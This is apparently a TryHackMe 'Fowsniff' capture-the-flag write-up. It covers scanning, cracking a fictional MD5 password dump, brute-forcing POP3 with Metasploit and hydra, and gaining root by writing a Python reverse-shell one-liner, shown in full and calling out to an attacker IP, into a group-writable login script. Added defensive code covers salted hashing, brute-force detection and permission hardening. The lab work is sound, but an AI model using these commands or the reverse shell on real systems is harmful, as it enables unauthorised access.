【THM】Fowsniff CTF
0x00 Information gathering
Once we have the target IP we ping it first to check that it is reachable. It responds.
We then launch an aggressive nmap scan. It is fairly slow, so we visit the web service while it runs and come back to the nmap report afterwards.
┌──(root㉿Breeze)-[/home/breeze/Desktop]
└─# nmap 10.10.184.242 -sV -sS -A -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 19:30 CST
Nmap scan report for 10.10.184.242
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
| 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry
|_/
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING USER AUTH-RESP-CODE CAPA SASL(PLAIN) RESP-CODES UIDL TOP
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR ID LOGIN-REFERRALS OK AUTH=PLAINA0001 have post-login ENABLE capabilities IMAP4rev1 listed Pre-login LITERAL+ more IDLE
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/17%OT=22%CT=1%CU=35826%PV=Y%DS=5%DC=T%G=Y%TM=6647
OS:401A%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%TS=8)SEQ(S
OS:P=109%GCD=1%ISR=10B%TI=Z%CI=RD%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3
OS:=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=6
OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=N)
Network Distance: 5 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 167.29 ms 10.17.0.1
2 ... 4
5 298.57 ms 10.10.184.242
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds
I open the web page and check robots.txt, which contains nothing useful, but I do find a Twitter account and do some OSINT on it.
The OSINT turns up password information.
0x01 Cracking the MD5 hashes
FOWSNIFF CORP PASSWORD LEAK
''~``
( o o )
+-----.oooO--(_)--Oooo.------+
| |
| FOWSNIFF |
| got |
| PWN3D!!! |
| |
| .oooO |
| ( ) Oooo. |
+---------\ (----( )-------+
\_) ) /
(_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!
Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!
MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P
l8r n00bz!
B1gN1nj4
-------------------------------------------------------------------------------------------------
This list is entirely fictional and is part of a Capture the Flag educational challenge.
--- THIS IS NOT A REAL PASSWORD LEAK ---
All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.
Any similarities to actual people or entities is purely coincidental and occurred accidentally.
-------------------------------------------------------------------------------------------------
sed -n 's/.*://p' 1.txt > hashes.txt
We use this command to save only the hash values (everything after the colon) to hashes.txt.
We then try to crack the hashes. They are unsalted MD5, so a wordlist or lookup-table attack is enough.
awk -F'@' '{print $1}' fowsniff.txt > users.txt
We use this command to extract the usernames (everything before the @) into users.txt.
sed -n 's/.*://p' cracked.txt > pass.txt
This command saves the cracked passwords to pass.txt.
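The three sed/awk one-liners above split the dump into a username list and a hash list and then pair them back up with the cracked values. The following added example (my own code, not from the original writeup or the THM room) does the same parsing in one validated pass, shows why the dump is so easy to work with (unsalted MD5 means one hash table serves every user, and identical digests expose password reuse), and contrasts it with the per-user salted, slow hashing a defender should have used. The dump lines, passwords and wordlist are all constructed here and are not the page's values.

```python
import hashlib
import os
import re
from collections import defaultdict

# Shape of each leaked line on the page: user@host:32-hex-char MD5 digest.
DUMP_LINE = re.compile(r"^([A-Za-z0-9._-]+)@([A-Za-z0-9.-]+):([0-9a-fA-F]{32})$")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


# Constructed sample dump in the same layout as the leak; the passwords
# (and therefore the hashes) are invented here, not the page's.
_SAMPLE_PASSWORDS = {"alice": "winter2019", "bob": "winter2019", "carol": "x9!Qz#Lm7pV"}
SAMPLE_DUMP = (
    "FOWSNIFF CORP PASSWORD DUMP!\n"
    + "".join(f"{u}@example:{md5_hex(p)}\n" for u, p in _SAMPLE_PASSWORDS.items())
    + "--- THIS IS NOT A REAL PASSWORD LEAK ---\n"
)

# Constructed stand-in for a rockyou-style wordlist.
SAMPLE_WORDLIST = ["password", "123456", "winter2019", "summer2020"]


def parse_dump(text: str):
    """Return [(user, host, hash)] for well-formed lines, skipping banner text.
    Equivalent to the sed/awk pair on the page, but rejects malformed lines."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).lower()))
    return entries


def match_unsalted(entries, wordlist):
    """Unsalted MD5: hash each candidate once, then look it up for every user.
    Cost is len(wordlist) hashes no matter how many accounts leaked."""
    table = {md5_hex(w): w for w in wordlist}
    return {user: table[h] for user, _, h in entries if h in table}


def reused_passwords(entries):
    """Identical unsalted digests mean identical passwords, visible without cracking."""
    groups = defaultdict(list)
    for user, _, h in entries:
        groups[h].append(user)
    return [users for users in groups.values() if len(users) > 1]


# --- What the defender should have stored instead: per-user salt + slow KDF ---

def salted_store(passwords):
    """Per-user random salt plus scrypt (hashlib, 16 MiB work factor here)."""
    store = {}
    for user, pw in passwords.items():
        salt = os.urandom(16)
        digest = hashlib.scrypt(pw.encode(), salt=salt, n=2 ** 14, r=8, p=1)
        store[user] = (salt, digest)
    return store


def verify_salted(store, user, candidate):
    salt, digest = store[user]
    return hashlib.scrypt(candidate.encode(), salt=salt, n=2 ** 14, r=8, p=1) == digest


if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print("matched:", match_unsalted(entries, SAMPLE_WORDLIST))
    print("reuse groups:", reused_passwords(entries))
    store = salted_store(_SAMPLE_PASSWORDS)
    print("alice == bob digest?", store["alice"][1] == store["bob"][1])
```

With the salted store, alice and bob share a password but get different digests, and every candidate must be re-hashed per user at scrypt cost rather than looked up once in an MD5 table.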
Gaining access with MSF
We use auxiliary/scanner/pop3/pop3_login in msf
to brute-force the POP3 service.
Both msf and Hydra find a valid login!
We connect with nc, log in with USER and PASS, and read the mail.
The first mail contains an account and a password.
We log in over ssh with it.
Here is the password.
We also run the attack with hydra.
Logging in over ssh gives us a shell.
Reverse shell
After the ssh login a banner is printed, so some script must run at login.
We check groups to see which groups the current user belongs to.
We look for files belonging to the users group.
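The pop3_login and hydra runs above leave a very recognisable trail on the server: a burst of failed PLAIN logins from one source, cycling through the usernames from the leak, followed by one success. The following added example (my own code, not from the writeup or THM) shows the detection side: it parses Dovecot pop3-login log lines and raises one alert per source IP whose failures inside a sliding window reach a threshold, reporting how many distinct users were tried (spraying) and whether a successful login followed the burst. The log lines are constructed in the usual Dovecot syslog shape; the IPs are the lab addresses from the page and the usernames come from the leaked list, but the events themselves are invented.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Dovecot pop3-login events (syslog prefix + dovecot message).
SAMPLE_LOG = """\
May 17 19:41:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mauer>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mustikka>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:04 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:05 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<baksteen>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:06 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<stone>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:07 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mursten>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242
May 17 19:41:09 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=10.17.48.147, lip=10.10.184.242, mpid=2201
May 17 20:03:11 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 4 secs): user=<tegel>, method=PLAIN, rip=10.17.0.55, lip=10.10.184.242
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, "
    r"method=\S+, rip=(?P<rip>[\d.]+)"
)


def parse_line(line, year=2024):
    """Return (timestamp, success, user, rip) or None for lines we do not handle.
    Syslog lines carry no year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["event"] == "Login", m["user"], m["rip"]


def detect_bruteforce(log_text, window_s=60, threshold=5):
    """One alert per source IP whose failed logins inside any window_s-second
    window reach threshold. A success at or after the last failure turns the
    alert from 'noise' into 'probable account compromise'."""
    by_rip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_rip[ev[3]].append(ev)

    alerts = []
    for rip, evs in by_rip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if not e[1]]
        # Sliding window over failure timestamps to find the densest burst.
        peak, start = 0, 0
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1][0]
        success_after = [e[2] for e in evs if e[1] and e[0] >= last_fail]
        alerts.append({
            "rip": rip,
            "peak_failures": peak,
            "distinct_users": len({e[2] for e in fails}),
            "success_after_burst": success_after,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failure from 10.17.0.55 never reaches the threshold and produces nothing, while the 10.17.48.147 burst is flagged with six distinct users tried and a success right after it. The same window logic is what fail2ban's dovecot jail applies before it blocks the source.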
find / -group users -type f 2>/dev/null
This command lists every regular file (directories excluded) on the system that belongs to the "users" group.
We find cube.sh.
We open it in vim and write in a Python reverse-shell payload, changing the IP to the attacker's IP, and start a listener with nc.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.48.147",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We use python3 -c 'import pty;pty.spawn("/bin/bash")' to upgrade to a stable shell.
The callback comes in as root.
Task complete.
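The root cause of this privilege escalation is a script that root runs at login (the banner) but that members of the users group can edit. The following added example (my own code, not from the writeup or THM) is the audit a defender would run to find that pattern and the fix that closes it: walk the directories whose scripts run at login, flag regular files that are writable by group or other (executables first), then strip those write bits. It builds a constructed temp directory with a cube.sh in the same 775 state as the page's, so it runs offline; on a real host you would point it at /etc/profile.d, /etc/update-motd.d and whatever the banner sources.

```python
import os
import stat
import tempfile


def writable_by_others(st: os.stat_result):
    """Who besides the owner may write the file: any of 'group', 'other'."""
    who = []
    if st.st_mode & stat.S_IWGRP:
        who.append("group")
    if st.st_mode & stat.S_IWOTH:
        who.append("other")
    return who


def audit_writable_scripts(roots):
    """Report regular files under roots that group or other can write.
    Each finding: {path, name, mode, executable, writable_by}, sorted by path.
    A group-writable executable that root runs (the page's cube.sh) is the
    case that gives a low-privileged user code execution as root."""
    findings = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                who = writable_by_others(st)
                if who:
                    findings.append({
                        "path": path,
                        "name": name,
                        "mode": oct(stat.S_IMODE(st.st_mode)),
                        "executable": bool(st.st_mode & 0o111),
                        "writable_by": who,
                    })
    return sorted(findings, key=lambda f: f["path"])


def harden(findings):
    """Strip group/other write bits from every flagged file (chmod go-w)."""
    for f in findings:
        st = os.lstat(f["path"])
        os.chmod(f["path"], stat.S_IMODE(st.st_mode) & ~(stat.S_IWGRP | stat.S_IWOTH))


def build_demo_tree():
    """Constructed stand-in for the target filesystem: a temp dir holding a
    group-writable login script (cube.sh, 775), a correctly permissioned one
    (00-header, 755) and a world-writable non-executable file (notes.txt, 666)."""
    base = tempfile.mkdtemp(prefix="fowsniff-audit-")
    samples = {"cube.sh": 0o775, "00-header": 0o755, "notes.txt": 0o666}
    for name, mode in samples.items():
        p = os.path.join(base, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho banner\n" if name != "notes.txt" else "todo\n")
        os.chmod(p, mode)
    return base


def run_demo():
    """Audit the constructed tree, harden it, audit again."""
    base = build_demo_tree()
    before = audit_writable_scripts([base])
    harden(before)
    after = audit_writable_scripts([base])
    return {
        "before": [(f["name"], f["writable_by"], f["executable"]) for f in before],
        "after": [f["name"] for f in after],
    }


if __name__ == "__main__":
    print(run_demo())
```

Before hardening, cube.sh is reported as group-writable and executable and notes.txt as writable by both group and other; after chmod go-w the audit returns nothing. Scripts that root executes at login should be owned by root with mode 755 or tighter, never writable by a shared group such as users.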